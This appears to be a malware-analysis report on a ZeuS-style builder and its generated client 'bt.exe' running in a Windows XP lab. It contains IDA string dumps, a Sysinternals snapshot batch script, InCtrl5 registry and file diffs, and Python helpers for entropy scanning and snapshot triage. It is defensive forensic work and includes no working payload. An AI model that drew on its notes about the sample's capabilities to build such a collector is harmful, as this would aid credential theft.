.text:0041CD08 00000011 C BringWindowToTop

.text:0041CD1C 0000000B C BlockInput

.text:0041CD28 0000000B C BeginPaint

.text:0041CD34 00000014 C BeginDeferWindowPos

.text:0041CD48 00000012 C AttachThreadInput

.text:0041CD5C 00000015 C ArrangeIconicWindows

.text:0041CD74 0000000C C AppendMenuW

.text:0041CD80 0000000C C AppendMenuA

.text:0041CD8C 00000009 C AnyPopup

.text:0041CD98 0000000E C AnimateWindow

.text:0041CDA8 00000013 C AdjustWindowRectEx

.text:0041CDBC 00000011 C AdjustWindowRect

.text:0041CDD0 00000016 C UnlockServiceDatabase

.text:0041CDE8 00000017 C TrusteeAccessToObjectW

.text:0041CE00 00000017 C TrusteeAccessToObjectA

.text:0041CE18 0000000E C StartServiceW

.text:0041CE28 0000001C C StartServiceCtrlDispatcherW

.text:0041CE44 0000001C C StartServiceCtrlDispatcherA

.text:0041CE60 0000000E C StartServiceA

.text:0041CE70 00000014 C SetTokenInformation

.text:0041CE84 0000000F C SetThreadToken

.text:0041CE94 00000011 C SetServiceStatus

.text:0041CEA8 00000019 C SetServiceObjectSecurity

.text:0041CEC4 0000000F C SetServiceBits

.text:0041CED4 00000013 C SetSecurityInfoExW

.text:0041CEE8 00000013 C SetSecurityInfoExA

.text:0041CEFC 00000010 C SetSecurityInfo

.text:0041CF0C 0000001A C SetSecurityDescriptorSacl

.text:0041CF28 0000001B C SetSecurityDescriptorOwner

.text:0041CF44 0000001B C SetSecurityDescriptorGroup

.text:0041CF60 0000001A C SetSecurityDescriptorDacl

.text:0041CF7C 00000019 C SetPrivateObjectSecurity

.text:0041CF98 00000016 C SetNamedSecurityInfoW

.text:0041CFB0 00000018 C SetNamedSecurityInfoExW

.text:0041CFC8 00000018 C SetNamedSecurityInfoExA

.text:0041CFE0 00000016 C SetNamedSecurityInfoA

.text:0041CFF8 00000018 C SetKernelObjectSecurity

.text:0041D010 00000011 C SetFileSecurityW

.text:0041D024 00000011 C SetFileSecurityA

.text:0041D038 00000017 C SetEntriesInAuditListW

.text:0041D050 00000017 C SetEntriesInAuditListA

.text:0041D068 00000011 C SetEntriesInAclW

.text:0041D07C 00000011 C SetEntriesInAclA

.text:0041D090 00000018 C SetEntriesInAccessListW

.text:0041D0A8 00000018 C SetEntriesInAccessListA

.text:0041D0C0 00000012 C SetAclInformation

.text:0041D0D4 0000000D C RevertToSelf

.text:0041D0E4 0000000D C ReportEventW

.text:0041D0F4 0000000D C ReportEventA

.text:0041D104 0000001C C RegisterServiceCtrlHandlerW

.text:00422488 00000015 C BeginUpdateResourceW

.text:004224A0 00000015 C BeginUpdateResourceA

.text:004224B8 00000005 C Beep

.text:004224C0 0000000C C BackupWrite

.text:004224CC 0000000B C BackupSeek

.text:004224D8 0000000B C BackupRead

.text:004224E4 00000010 C AreFileApisANSI

.text:004224F4 0000000D C AllocConsole

.text:00422504 00000009 C AddAtomW

.text:00422510 00000009 C AddAtomA

.text:00422520 00000006 C entry

.text:00422528 0000000D C imagehlp.dll

.text:00422538 00000013 C CheckSumMappedFile

.text:0042254C 00000005 C DanS

.text:00422554 00000005 C Rich

.text:0042255C 00000006 C .text

.text:00422564 00000007 C .rdata

.text:0042256C 00000006 C .data

.text:00428776 0000000A C WriteFile

.text:00428782 00000009 C ReadFile

.text:0042878C 0000000C C CreateFileW

.text:0042879A 0000000B C OpenMutexW

.text:004287A6 00000018 C SetNamedPipeHandleState

.text:004287C0 0000000C C HeapReAlloc

.text:0042885C 00000014 C MultiByteToWideChar

.text:00428872 0000000E C GetFileSizeEx

.text:00428882 00000013 C CreateFileMappingW

.text:00428896 00000013 C SetFileAttributesW

.text:004288AA 0000000D C CreateThread

.text:004288B8 0000000C C CloseHandle

.text:004288C6 00000006 C Sleep

.text:004288CE 00000011 C GetModuleHandleA

.text:004288E0 0000000D C LoadLibraryA

.text:004288EE 0000000F C GetProcAddress

.text:004288FE 00000013 C GetModuleFileNameW

.text:00428912 0000000C C ExitProcess

.text:00428920 0000000A C lstrcmpiA

.text:0042892C 00000009 C lstrcpyW

.text:00428936 00000014 C WideCharToMultiByte

.text:0042894C 0000000C C DeleteFileW

.text:0042895A 0000000E C CryptHashData

.text:0042896A 00000011 C CryptDestroyHash

.text:0042897C 00000010 C CryptCreateHash

.text:0042898E 00000012 C CryptGetHashParam

.text:004289A2 00000014 C CryptReleaseContext

.text:004289B8 00000015 C CryptAcquireContextW

.text:004289CE 00000011 C GetSaveFileNameW

.text:004289E0 00000011 C GetOpenFileNameW

.text:004289F2 0000000E C OleInitialize

.text:00428A2C 00000014 C PathRemoveFileSpecW

.text:00428A60 00000012 C PathFindFileNameA

.text:00428A74 0000000D C PathCombineW

.text:00428A82 00000015 C GetWindowTextLengthW

.text:00428A98 0000000C C MessageBoxW

.text:00428AFC 00000013 C CreateDialogParamW

.text:00428B10 0000000B C GetDlgItem

.text:00428B1C 0000000F C SetWindowLongW

.text:00428B2C 00000010 C GetDlgItemTextW

.data:00429028 00000005 C ¯¦\bÖ


From the "bt.exe" and "zse.exe" IDA Pro details we can conclude that the generated client malware is a large set of input-driven functions that collect just about everything of interest on the XP system. The generated "bt.exe" carries only a few input-driven routines to support its configuration, such as the encryption and file-path functions. "zse.exe" holds the full set and builds the collector "bt.exe" from its master library of functions. When it generates "bt.exe", "zse.exe" encrypts the configuration details and embeds them in the "bt.exe" image, so the individual configuration values cannot be distinguished in the strings listing. I highlighted the complete section within the "bt.exe" IDA Pro output file that covers this encrypted area. Judging by the API names listed above (process and remote-thread creation, file and file-mapping access, security-descriptor and service control, CryptoAPI hashing, clipboard and keyboard-state access), the client has enough of the Windows XP API to reach the registry, the file system and other processes and modify anything on the system; it can do whatever its author programs it to.
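The encrypted configuration region referred to above can be located even though IDA shows no strings for it. The following is an added example, not code from the report or from IDA Pro: it lists NUL-terminated ASCII strings in the same "offset length C text" layout as the dump above (the length field counts the terminating NUL, which is why GetProcAddress is listed as 0000000F), and it scans the image in fixed windows for Shannon entropy, so that a blob of encrypted configuration, which yields no readable strings, stands out as a high-entropy range instead of a silent gap. The image it scans is constructed for the example: a handful of API names from the dump placed at invented offsets, followed by 1024 bytes of deterministic SHA-256 output standing in for the encrypted configuration. The 6.5-bit threshold and the 4-character minimum are this example's parameters (the dump lists 4-character names such as Beep), not values taken from the report.

```python
"""Locate readable strings and the opaque (encrypted) region in a binary image.

Added example; not code from the report or from IDA Pro.  find_strings()
reproduces the "offset length C text" layout of the IDA Strings export above
(length includes the terminating NUL); high_entropy_regions() flags windows
whose byte entropy is too high for code, text or padding, which is how an
embedded encrypted configuration shows up when it yields no strings at all.
The image scanned below is constructed: API names from the dump at invented
offsets, then 1024 bytes of deterministic SHA-256 output as a stand-in blob.
"""
import hashlib
import math
from collections import Counter


def find_strings(buf, min_len=4, base=0):
    """Return (address, length_including_NUL, text) for NUL-terminated ASCII runs.

    min_len=4 matches the dump above, which lists 4-character names such as Beep."""
    found, start = [], None
    for i, b in enumerate(buf):
        printable = 0x20 <= b < 0x7F
        if printable and start is None:
            start = i
        elif not printable and start is not None:
            if b == 0 and i - start >= min_len:
                found.append((base + start, i - start + 1, buf[start:i].decode("ascii")))
            start = None
    return found


def format_ida_line(addr, length, text, section=".text"):
    """Render one entry the way the IDA Strings export above is laid out."""
    return f"{section}:{addr:08X} {length:08X} C {text}"


def shannon_entropy(data):
    """Bits per byte of the buffer: 0.0 for a constant run, 8.0 at most."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def high_entropy_regions(buf, window=256, threshold=6.5):
    """Merge adjacent windows at or above the threshold into (start, end) ranges.

    6.5 bits is this example's heuristic: 256 bytes of random-looking data sit
    near 7.2 bits, while API-name tables and zero padding stay far below."""
    regions = []
    for off in range(0, len(buf) - window + 1, window):
        if shannon_entropy(buf[off:off + window]) >= threshold:
            if regions and regions[-1][1] == off:
                regions[-1] = (regions[-1][0], off + window)
            else:
                regions.append((off, off + window))
    return regions


def _pseudo_encrypted(n, seed=b"example-config"):
    """Deterministic high-entropy filler; a stand-in, not the real ZeuS config format."""
    out, state = b"", seed
    while len(out) < n:
        state = hashlib.sha256(state).digest()
        out += state
    return out[:n]


def build_sample():
    """Constructed image: API names with NUL padding in [0, 512), blob in [512, 1536)."""
    buf = bytearray(1792)
    names = ((0x10, b"GetProcAddress"), (0x20, b"CreateRemoteThread"),
             (0x40, b"CryptHashData"), (0x50, b"GetAsyncKeyState"), (0x70, b"Rich"))
    for off, name in names:
        buf[off:off + len(name)] = name
    buf[512:1536] = _pseudo_encrypted(1024)
    return bytes(buf)


SAMPLE = build_sample()

if __name__ == "__main__":
    for entry in find_strings(SAMPLE, base=0x00420000):
        print(format_ida_line(*entry))
    for start, end in high_entropy_regions(SAMPLE):
        print(f"opaque region {start:#x}-{end:#x}: no strings, entropy >= 6.5 bits/byte")
```

Against a real sample the same two passes are run over each PE section; a high-entropy range with no strings in it is the first candidate for the embedded configuration, and which routine reads that range is the next question for the disassembler.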


Other Quick Analysis

Process Explorer, Process Monitor, PsList, ListDLLs, TCPView and RootkitRevealer (utilities from the Sysinternals Suite)[6] were used to see what other interesting comparisons could be found between the host before and after "bt.exe" was executed. InCtrl5[7] was also used to see what it would find. A simple batch script, "kjk_before.bat", was written to run these tools in an orderly manner, and the "before" and "after" output files were compared with WinMerge[8].

kjk_before.bat:

REM Text snapshots for diffing: process list and loaded DLLs, redirected to files
pslist > pslist_before.txt
listdlls > listdlls_before.txt
REM Interactive tools for manual inspection; each blocks the script until it is closed
procmon
procexp
Tcpview
RootkitRevealer

The Sysinternals Suite was extracted and "kjk_before.bat" was placed in the same folder. "kjk_before.bat" was executed from that folder, and once the batch finished its output files were moved into a folder called "before". InCtrl5 was then used to launch "bt.exe", so that it could record its own "before" and "after" state. After InCtrl5 completed, "kjk_before.bat" was run again to capture the same information for the now-infected host, and those output files were put into a folder called "after".

[6] http://technet.microsoft.com/en-us/sysinternals/bb842062

[7] http://simontodd.com/2010/02/inctrl-5-application-analysys-tool-download-and-enjoy/

[8] http://winmerge.org/
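The comparison itself can be automated rather than eyeballed in WinMerge. The following is an added example, not code from the report or from the Sysinternals, InCtrl5 or WinMerge tools: it diffs two pslist captures by process name and PID (the CPU Time and Elapsed Time columns differ between any two runs, so a raw line diff flags every process), and it parses an InCtrl5 installation report of the layout shown in the next section, sorting the registry changes into execution evidence (entries that name bt.exe, such as the MUICache value the report records), baseline churn (the RNG Seed, SavedLegacySettings and service-profile Shell Folders values, which this example assumes change on an idle XP host regardless of the sample) and anything left over, which is where a persistence key would land. The pslist captures are constructed for the example; the host name, PIDs and times are invented.

```python
"""Before/after snapshot triage for the kjk_before.bat / InCtrl5 procedure.

Added example, not code from the report or from the Sysinternals, InCtrl5 or
WinMerge tools.  It (1) diffs two pslist captures on (name, PID) rather than raw
lines, since CPU Time and Elapsed Time differ between any two runs and swamp a
text diff, and (2) parses an InCtrl5 report, separating registry churn an idle
XP host produces anyway from changes that point at the sample.  The captures are
constructed (PIDs, times invented); the InCtrl5 excerpt keeps the report's layout.
"""
import re

PSLIST_BEFORE = """\
Process information for VICTIM-XP:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
System                4   8  52  258      0     0:00:05.187     0:00:00.000
explorer           1380   8  11  332  11976     0:00:03.265     0:12:58.734
wuauclt            1620   8   4   98   2304     0:00:00.109     0:02:10.000
"""
PSLIST_AFTER = """\
Process information for VICTIM-XP:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
System                4   8  53  262      0     0:00:05.921     0:00:00.000
explorer           1380   8  12  341  12240     0:00:03.781     0:15:16.265
bt                 1892   8   2   47   1140     0:00:00.031     0:00:04.125
"""

def parse_pslist(text):
    """Set of (name, pid); the banner and the column header are skipped."""
    procs, in_table = set(), False
    for line in text.splitlines():
        if line.startswith("Name "):
            in_table = True
            continue
        parts = line.split()
        if in_table and len(parts) >= 2 and parts[1].isdigit():
            procs.add((parts[0], int(parts[1])))
    return procs

def diff_processes(before_text, after_text):
    """Processes seen only after the sample ran, and only before it."""
    before, after = parse_pslist(before_text), parse_pslist(after_text)
    return sorted(after - before), sorted(before - after)

INCTRL5_EXCERPT = r"""
Values added: 1
---------------
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\Documents and Settings\Kevin\Desktop\bt.exe"
Type: REG_SZ
Data: bt
Values changed: 1
------------------
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Application Data
New data: C:\WINDOWS\system32\config\systemprofile\Application Data
"""

# Keys assumed to change on an idle XP host whatever was run (this example's
# list; build your own from clean baseline runs of the same procedure).
VOLATILE = [
    r"\\Cryptography\\RNG\\Seed$",                              # reseeded on CryptoAPI use
    r"\\Connections\\SavedLegacySettings$",                     # WinINet settings counter
    r"^HKEY_USERS\\(\.DEFAULT|S-1-5-18)\\.*\\Shell Folders\\",  # SYSTEM/service profiles
]
SECTION_RE = re.compile(r"^(Keys|Values) (ignored|added|deleted|changed): \d+$")
VALUE_RE = re.compile(r'^(HKEY_\S.*?) "(.*)"$')
FIELD_RE = re.compile(r"^(Type|Data|Old type|New type|Old data|New data): ?(.*)$")

def parse_inctrl5(text):
    """One dict per key or value entry: section, path (key\\name) and data fields."""
    changes, section, current = [], None, None
    for line in (l.rstrip() for l in text.splitlines()):
        if m := SECTION_RE.match(line):
            section, current = f"{m.group(1)} {m.group(2)}", None
        elif not line or set(line) <= {"-", "*"} or section is None or line == "* (none)":
            continue
        elif section.startswith("Keys"):                    # whole-key add/delete lines
            changes.append({"section": section, "path": line, "fields": {}})
        elif m := VALUE_RE.match(line):                     # KEY "ValueName"
            current = {"section": section, "path": m.group(1) + "\\" + m.group(2), "fields": {}}
            changes.append(current)
        elif (m := FIELD_RE.match(line)) and current:
            current["fields"][m.group(1)] = m.group(2)
    return changes

def triage(text, sample_name):
    """Bucket InCtrl5 changes: evidence the sample ran, baseline noise, the rest.

    An entry whose path or data names the sample file is execution evidence; the
    MUICache value in the report is one (the shell caches a program's display name
    once it has shown it, so the entry is normally read as "this binary ran")."""
    buckets = {"evidence": [], "noise": [], "interesting": []}
    for c in parse_inctrl5(text):
        blob = (c["path"] + " " + " ".join(c["fields"].values())).lower()
        if sample_name.lower() in blob:
            buckets["evidence"].append(c)
        elif any(re.search(p, c["path"]) for p in VOLATILE):
            buckets["noise"].append(c)
        else:
            buckets["interesting"].append(c)
    return buckets
```

Run the procedure twice on a clean machine first and move any keys that still change into VOLATILE; the "interesting" bucket is then short enough to read in full, and a Run key or service entry written by the sample cannot hide among the nineteen changed values the report lists.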


The next few tables represent the results of what was discovered.

InCtrl5:

Installation Report: bt

Generated by InCtrl5, version 1.0.0.0

Install program: C:\Documents and Settings\Kevin\Desktop\bt.exe

4/24/2011 8:02 PM

------------------------------------------------------------

Registry

********

Keys ignored: 0

---------------

* (none)

Keys added: 2

-------------

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\à

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\à

Keys deleted: 2

---------------

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\t

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\t

Values added: 1

---------------

HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\Documents and Settings\Kevin\Desktop\bt.exe"

Type: REG_SZ

Data: bt

Values changed: 19

------------------

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\NetworkService\Application Data

New data: C:\WINDOWS\system32\config\systemprofile\Application Data

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files

New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"

Old type: REG_SZ

New type: REG_SZ

Old data: C:\Documents and Settings\LocalService\Cookies

New data: C:\WINDOWS\system32\config\systemprofile\Cookies

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"

Old type: REG_SZ

New type: REG_SZ


Old data: C:\Documents and Settings\NetworkService\Local Settings\History

New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections "SavedLegacySettings"

Old type: REG_BINARY

New type: REG_BINARY

Old data: 46, 00, 00, 00, 0C, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00, 00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00

New data: 46, 00, 00, 00, 0D, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00, 00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00

HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Application Data
New data: C:\WINDOWS\system32\config\systemprofile\Application Data

HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files

HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\LocalService\Cookies
New data: C:\WINDOWS\system32\config\systemprofile\Cookies

HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Local Settings\History
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History

HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections "SavedLegacySettings"
Old type: REG_BINARY
New type: REG_BINARY
Old data: 46, 00, 00, 00, 0C, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00, 00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
New data: 46, 00, 00, 00, 0D, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00, 00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG "Seed"
Old type: REG_BINARY
New type: REG_BINARY
Old data: CC, 90, 4A, 9F, 9B, DA, 48, D5, 27, 35, 0E, FD, 53, F6, 0D, FC, 6A, 3B, E4, 76, C7, E1, 6F, D6, 29, 85, D8, 01, 2F, A0, 8C, E0, 8B, 12, 95, 13, 68, 82, FC, C4, 41, DE, D9, 90, 41, AE, C3, B2, 52, 11, 99, FC, CB, 5B, 1D, E3, 1D, E2, 17, A3, 1A, 34, 28, 42, ED, 02, 5A, 4C, 58, E1, 7C, DC, 30, 09, B1, 2C, 08, A2, 96, A2
New data: 7E, 4F, 14, E1, 46, 40, C9, 10, D8, 57, EE, 23, 5E, 8A, E2, B1, 7F, 24, 5A, 12, C4, F5, BE, 01, 37, 8C, 92, 94, 05, 7E, CF, AE, A9, 9F, BF, F4, F7, CA, DB, 6A, 91, 16, C2, 92, 54, 8E, 4D, DB, 83, 86, 93, A1, FE, 71, 93, 2F, E6, 75, D4, FE, C0, 38, FB, 3A, EE, 0B, 7B, 53, D2, BE, C9, E9, 26, 5A, 07, 1B, C8, AD, 73, 55

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch "Epoch"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 6E, 01, 00, 00
New data: 70, 01, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-8BBF40B640BF} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-4BDE-9EFE-D137415271B6} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-4BDE-9EFE-D137415271B6} "DhcpRetryTime"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 25, 01, 00, 00
New data: 49, 01, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch "Epoch"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 6E, 01, 00, 00
New data: 70, 01, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-A011-8BBF40B640BF} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-4BDE-9EFE-D137415271B6} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-4BDE-9EFE-D137415271B6} "DhcpRetryTime"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 25, 01, 00, 00
New data: 49, 01, 00, 00

------------------------------------------------------------
Disk contents
*************
Drives tracked: 1
-----------------
* c:\

Folders deleted: 1
------------------
c:\WINDOWS\system32\lowsec

Files deleted: 2
----------------
c:\WINDOWS\system32\lowsec\user.ds
Date: 4/24/2011 7:41 PM
Size: 2,423 bytes

c:\WINDOWS\system32\lowsec\user.ds.lll
Date: 3/23/2011 11:46 PM
Size: 1,377 bytes

Files changed: 21
-----------------
c:\Documents and Settings\Kevin\NTUSER.DAT.LOG
Old date: 4/24/2011 8:01 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes

c:\Documents and Settings\Kevin\Cookies\index.dat
Old date: 4/24/2011 7:58 PM
New date: 4/24/2011 8:01 PM
Old size: 32,768 bytes
New size: 32,768 bytes

c:\Documents and Settings\Kevin\Local Settings\History\History.IE5\index.dat
Old date: 4/24/2011 7:58 PM
New date: 4/24/2011 8:01 PM
Old size: 49,152 bytes
New size: 49,152 bytes

c:\Documents and Settings\Kevin\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 7:58 PM
New date: 4/24/2011 8:01 PM
Old size: 425,984 bytes
New size: 425,984 bytes

c:\Documents and Settings\LocalService\ntuser.dat.LOG
Old date: 4/24/2011 7:44 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes

c:\Documents and Settings\LocalService\Local Settings\Temp\Cookies\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes

c:\Documents and Settings\LocalService\Local Settings\Temp\History\History.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes

c:\Documents and Settings\LocalService\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes

c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 7:44 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes

c:\Documents and Settings\NetworkService\ntuser.dat.LOG
Old date: 4/24/2011 7:44 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes

c:\Documents and Settings\NetworkService\Local Settings\Temp\Cookies\index.dat
Old date: 4/24/2011 3:29 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes

c:\Documents and Settings\NetworkService\Local Settings\Temp\History\History.IE5\index.dat
Old date: 4/24/2011 3:29 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes

c:\Documents and Settings\NetworkService\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 3:29 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes

c:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 7:42 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes

c:\WINDOWS\Prefetch\BT.EXE-28F64617.pf
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 14,114 bytes
New size: 14,232 bytes

c:\WINDOWS\system32\config\default.LOG
Old date: 4/24/2011 7:55 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes

c:\WINDOWS\system32\config\software.LOG
Old date: 4/24/2011 8:01 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes

c:\WINDOWS\system32\config\system.LOG
Old date: 4/24/2011 8:01 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes

c:\WINDOWS\system32\config\systemprofile\Cookies\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes

c:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes

c:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 32,768 bytes
New size: 32,768 bytes

------------------------------------------------------------
INI file
********
Ini files tracked: 4
--------------------
* C:\boot.ini
* c:\windows\control.ini
* c:\windows\system.ini
* c:\windows\win.ini
------------------------------------------------------------
Text file
*********
Text files tracked: 2
---------------------
* c:\windows\system32\autoexec.nt
* c:\windows\system32\config.nt
------------------------------------------------------------
InCtrl5, Copyright © 2000 by Ziff Davis Media, Inc.
Written by Neil J. Rubenking
First published in PC Magazine, December 5, 2000.

WinMerge comparison of the ListDLLs output (only the lines unique to listdlls_after.txt are shown)

0x3d930000 0xd1000 7.00.6000.17095 wininet.dll
0x00aa0000 0x9000 6.00.5441.0000 Normaliz.dll
0x3dfd0000 0x45000 7.00.6000.17095 iertutil.dll
0x71ad0000 0x9000 5.01.2600.5512 wsock32.dll
0x7c9c0000 0x817000 6.00.2900.6072 shell32.dll
0x77f60000 0x76000 6.00.2900.5912 SHLWAPI.dll
0x5d090000 0x9a000 5.82.2900.6028 comctl32.dll
0x774e0000 0x13e000 5.01.2600.6010 ole32.dll
0x77a80000 0x95000 5.131.2600.5512 crypt32.dll
0x77b20000 0x12000 5.01.2600.5875 MSASN1.dll
0x68000000 0x36000 5.01.2600.5507 rsaenh.dll
0x76bf0000 0xb000 5.01.2600.5512 psapi.dll
0x662b0000 0x58000 5.01.2600.5512 hnetcfg.dll
0x76ee0000 0x3c000 5.01.2600.5512 RASAPI32.dll
0x76e90000 0x12000 5.01.2600.5512 rasman.dll
0x76eb0000 0x2f000 5.01.2600.5512 TAPI32.dll
0x76e80000 0xe000 5.01.2600.5512 rtutils.dll
0x77c70000 0x25000 5.01.2600.5876 msv1_0.dll
0x76790000 0xc000 5.01.2600.5512 cryptdll.dll
0x76d60000 0x19000 5.01.2600.5512 iphlpapi.dll
0x722b0000 0x5000 5.01.2600.5512 sensapi.dll
0x71a50000 0x3f000 5.01.2600.5625 mswsock.dll
0x76fc0000 0x6000 5.01.2600.5512 rasadhlp.dll
0x78130000 0x128000 7.00.6000.17095 urlmon.dll
0x76f20000 0x27000 5.01.2600.5625 DNSAPI.dll
0x71a90000 0x8000 5.01.2600.5512 wshtcpip.dll
